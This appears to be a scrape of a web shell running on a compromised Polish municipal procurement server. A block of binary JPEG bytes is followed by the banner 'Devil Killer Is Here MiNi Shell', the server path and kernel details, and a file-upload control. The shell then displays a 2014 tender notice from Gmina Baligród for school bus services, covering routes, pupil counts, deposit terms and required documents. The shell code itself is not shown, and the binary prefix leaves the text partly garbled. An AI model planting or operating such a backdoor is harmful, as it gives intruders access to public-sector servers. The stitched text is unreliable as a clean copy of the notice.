JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140616/202446-N-2014.html

<p class="kh_header"><b>Baligród: Świadczenie usług w zakresie przewozu uczniów do gimnazjum i szkół podstawowych na terenie Gminy Baligród w roku szkolnym 2014/2015</b><br>
<b>Numer ogłoszenia: 202446 - 2014; data zamieszczenia: 16.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Baligród , Plac Wolności 13, 38-606 Baligród, woj. podkarpackie, tel. 013 4684077, faks 013 4684077.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.baligrod.pl, http://bip.baligrod.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie przewozu uczniów do gimnazjum i szkół podstawowych na terenie Gminy Baligród w roku szkolnym 2014/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi z zakresu: przewozu uczniów do gimnazjum i szkół podstawowych na terenie Gminy Baligród w roku szkolnym 2014/2015, łącznie z zapewnieniem im opieki w trakcie przewozu.
Przewozy uczniów będą odbywały się na następujących trasach:
Rok szkolny 2014/2015
Rano; przywozy
Trasa I / autobus nr 1 /
07:00- Baligród-Kołonice;
07:10- Kołonice - Baligród Szkoła przez Jabłonki PGR, Bystre Oś., Bystre Zelmer, Baligród Góra;
07:27 Baligród Szkoła - Stężnica PGR;
07:23- Stężnica PGR - Baligród Szkoła przez Stężnica przystanek Stężnica Oś., Baligród Podzamcze;
07:42- Baligród Szkoła - Mchawa Gimnazjum;
07:46- Mchawa Gimnazjum - Baligród Szkoła;
07:51- Baligród Szkoła - Mchawa Gimnazjum;
07:55- Mchawa Gimnazjum - Baligród Szkoła Parking;

Trasa II / autobus nr 2/
06:58- Nowosiółki Pohulanka - Mchawa Gimnazjum P. Żerdenka;
07:22- Mchawa Gimnazjum - Baligród Szkoła;
07:28- Baligród Szkoła - Mchawa Gimnazjum;
07:35- Mchawa Gimnazjum - Mchawa Gimnazjum przez Cisowiec , Kielczawa;
08:00- Mchawa Gimnazjum - Roztoki Dolne;
08:06- Roztoki Dolne - Mchawa Gimnazjum;
08:10- Mchawa Gimnazjum - Nowosiółki Pohulanka;
08:30- Nowosiółki Pohulanka - Zahoczewie;
09:00- Zahoczewie - Nowosiółki Sklep ; Parking;

Odwozy
Trasa I /autobus nr 1/
12:25- Baligród Szkoła - Mchawa Gimnazjum;
13:35- Mchawa Gimnazjum - Baligród Szkoła; Stężnica PGR; Jabłonki;
13:55- Jabłonki - Baligród Szkoła - Mchawa Gimnazjum;
15:15- Mchawa Gimnazjum - Baligród Szkoła; Stężnica PGR; Jabłonki;
15:30- Jabłonki - Baligród ; Parking;

Trasa II /autobus nr 2/
12:25- Nowosiółki - Mchawa Gimnazjum;
12:35- Mchawa Gimnazjum - Mchawa Gimnazjum przez Cisowiec, Kielczawa, Roztoki;
13:05- Mchawa Gimnazjum - Baligród Szkoła;
13:30- Baligród Szkoła - Mchawa Gimnazjum;
13:35- Mchawa Gimnazjum - Nowosiółki Pohulanka;
14:07- Nowosiółki Pohulanka - Mchawa Gimnazjum przez Żerdenkę;
14:25- Mchawa Gimnazjum - Mchawa Gimnazjum przez Cisowiec, Kielczawa, Roztoki;
14:55- Mchawa Gimnazjum - Baligród Szkoła;
15:00- Baligród Szkoła - Mchawa Gimnazjum;
15:10- Mchawa Gimnazjum - Roztoki;
15:35- Roztoki Dolne - Nowosiółki Pohulanka p. Żerdenka;

W tym na następujących odcinkach trasy:
1.	Jabłonki PGR - Baligród SP -  10 uczniów;
2.	Jabłonki PGR - Mchawa Gimnazjum - 4 uczniów;
3.	Kołonice -	 Baligród SP - 7 uczniów;
4.	Kołonice - Mchawa Gimnazjum - 2 uczniów;
5.	Bystre Osiedle - Baligród SP - 2 uczniów;
6.	Bystre Osiedle - Mchawa Gimnazjum -  4 uczniów;
7.	Baligród Góra - Baligród SP - 4 uczniów;
8.	Baligród Góra - Baligród Mchawa NSP - 1 uczniów;
9.	Baligród Szkoła - Mchawa Gimnazjum  - 4 uczniów;
10.	Baligród koło parku - Mchawa Gimnazjum -  18 uczniów;
11.	Baligród koło poczty - Mchawa Gimnazjum  - 9 uczniów;
12.	Baligród Cmentarz Wojskowy - Mchawa Gimnazjum  - 7 uczniów;
13.	Baligród Cmentarz Wojskowy - Mchawa NSP -  2 uczniów;
14.	Baligród Cmentarz Wojskowy - Baligród SP - 3 uczniów;
15.	Baligród Podzamcze - Baligród SP -  4 uczniów;
16.	 Stężnica PGR - Baligród SP - 4 uczniów;
17.	 Stężnica Przystanek PKS - Baligród Szkoła  - 6 uczniów;
18.	 Stężnica Przystanek PKS - Mchawa Gimnazjum  -  4 uczniów;
19.	 Cisowiec - Mchawa Gimnazjum  - 4 uczniów;
20.	 Cisowiec - Mchawa NSP - 9 uczniów;
21.	 Mchawka - Mchawa NSP - 5 uczniów;
22.	 Mchawa - Mchawa Gimnazjum  - 2 uczniów;
23.	 Kielczawa - Mchawa Gimnazjum   - 7 uczniów;
24.	 Kielczawa - Mchawa NSP - 4 uczniów;
25.	 Roztoki Dolne - Mchawa Gimnazjum   - 5 uczniów;
26.	 Roztoki Dolne - Mchawa NSP - 7 uczniów;
27.	 Nowosiółki Pohulanka - Nowosiółki NSP - 3 uczniów;
28.	 Nowosiółki Sklep - Mchawa Gimnazjum -  5 uczniów;
29.	 Nowosiółki Sklep - Baligród SP - 1 uczniów;
30.	 Nowosiółki Sklep - Nowosiółki NSP - 2 uczniów;
31.	 Nowosiółki Muzeum - Mchawa Gimnazjum - 2 uczniów;
32.	 Nowosiółki Muzeum - Baligród SP - 2 uczniów;
33.	 Nowosiółki Muzeum - Nowosiółki NSP - 3 uczniów;
34.	 Zahoczewie Górne - Zahoczewie NSP - 3 uczniów;
35.	 Zahoczewie Górne - Mchawa Gimnazjum - 5 uczniów;
36.	 Zahoczewie Górne - Mchawa NSP - 5 uczniów;
37.	 Zahoczewie -Podskała - Mchawa NSP - 1 uczniów;
38.	 Zahoczewie Środek - Zahoczewie NSP - 3 uczniów;
39.	 Zahoczewie Szkoła - Mchawa Gimnazjum -  2 uczniów;
40.	 Zahoczewie - Podskała 	Nowosiółki NSP - 3 uczniów;
41.	 Żerdenka - Baligród SP - 2 uczniów ;


Rozkład jazdy oraz wykaz uczniów dojeżdżających z poszczególnych przystanków na rok szkolny 2014/2015 Zamawiający dostarczy Wykonawcy w dniu podpisania umowy.
Przewozy w okresie wakacji oraz inne (dowóz uczniów na basen, przewozy sportowców, itp.) realizowane na zlecenie Urzędu Gminy wg bieżących potrzeb .
Do świadczenia usług w zakresie transportu uczniów do szkół gmina oddaje do dyspozycji Wykonawcy 2 autobusy szkolne marki Autosan: typ H 9-2141S oraz typ H6-10.03.S. Warunki dzierżawy autobusów szkolnych określa projekt umowy dzierżawy (załącznik nr 1 do umowy), stanowiący integralną część umowy o świadczenie usług w zakresie przewozu dzieci do gimnazjum i szkół podstawowych. Umowa dzierżawy będzie zawarta na każdy dzierżawiony autobus osobno.
Ustala się minimalną stawkę czynszu dzierżawy za wszystkie pojazdy (2 pojazdy) w wysokości - 2 000,00 zł (netto) + VAT.
Wykonawca w razie awarii autobusów szkolnych zapewni minimum 2 autobusy zastępcze o liczbie miejsc siedzących co najmniej 22 każdy i spełniające właściwe wymagania techniczne w ruchu drogowym. Wykonawca podstawi autobus zastępczy niezwłocznie, nie później niż w ciągu 1 godziny od wystąpienia awarii uniemożliwiającej dalszą jazdę wyznaczonego autobusu szkolnego.
Wykonawca zapewni miejsca siedzące oraz odpowiednie warunki przewożonym dzieciom.
Wykonawca zobowiązany jest zatrudnić minimum 2 kierowców posiadających stosowne uprawnienia oraz minimum 2 opiekunów, odpowiedzialnych za kompleksową opiekę nad uczniami podczas dowozu oraz odwozu. Wykonawca ponosi wszelkie koszty związane zapewnieniem należytej opieki podczas wykonywania usługi, tj. na warunkach pracy i płacy nie gorszej niż te, na jakich byli zatrudnieni u Zamawiającego. Kierowca autobusu nie może jednocześnie sprawować opieki nad dziećmi.
Uczniowie placówek oświatowych będą korzystać z przewozu na podstawie imiennych biletów miesięcznych szkolnych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca składający oferty zobowiązany jest do wniesienia wadium w wysokości: 4 000,00 zł (słownie: cztery tysiące złotych).Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
- w pieniądzu, przelewem na rachunek bankowy:
Podkarpacki Bank Spółdzielczy Oddział w Lesku 
Nr 55 8642 1012 2003 1205 0293 0002
z adnotacją wadium - Świadczenie usług w zakresie przewozu uczniów do gimnazjum i szkół podstawowych na terenie Gminy Baligród w roku szkolnym 2014/2015;
w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym;
w gwarancjach bankowych;
w gwarancjach ubezpieczeniowych;
w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275)
w terminie do dnia 23.06.2014r. do godz. 10.00 Kserokopię polecenia przelewu potwierdzoną za /zgodność z oryginałem/ należy dołączyć do oferty. Jeżeli wadium jest wnoszone w formie innej niż pieniądz oryginały dokumentów, o których mowa wyżej należy złożyć w kasie Urzędu Gminy Baligród natomiast do oferty należy dołączyć kserokopię.
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
Wadium wniesione w pieniądzu należy złożyć najpóźniej na dzień przed terminem otwarcia ofert. Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego.
Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą w osobnej kopercie.
Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta / poręczyciela.
W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium Wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.
Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza.
Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy.
Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46 Prawa zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada specjalne uprawnienia (koncesja, zezwolenie, licencja), a w szczególności - Licencję na wykonywanie krajowego transportu drogowego w zakresie przewozu osób obowiązująca przez cały okres realizowania zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał lub wykonuje należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie (2) usługi w zakresie przewozu uczniów do szkół o wartości co najmniej 200 000,00 zł brutto (słownie: dwieście tysięcy złotych) - każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże posiadanie lub dysponowanie odpowiednim potencjałem technicznym, przez co Zamawiający rozumie zasoby sprzętowe pozostające w dyspozycji Wykonawcy, gwarantujące wykonanie powierzonego zmówienia. Wykonawca musi dysponować:
Wykonawca w razie awarii autobusów szkolnych zapewni minimum 2 autobusy zastępcze o liczbie miejsc siedzących co najmniej 22 każdy i spełniające właściwe wymagania techniczne w ruchu drogowym. Wykonawca podstawi autobus zastępczy niezwłocznie, nie później niż w ciągu 1 godziny od wystąpienia awarii uniemożliwiającej dalszą jazdę wyznaczonego autobusu szkolnego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca będzie dysponować:
co najmniej 2 kierowcami posiadającymi stosowne uprawnienia; co najmniej 2 opiekunów, odpowiedzialnych za kompleksową opiekę nad dziećmi podczas dowozu oraz odwozu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje polisą lub innym dokumentem potwierdzającym, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 500 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
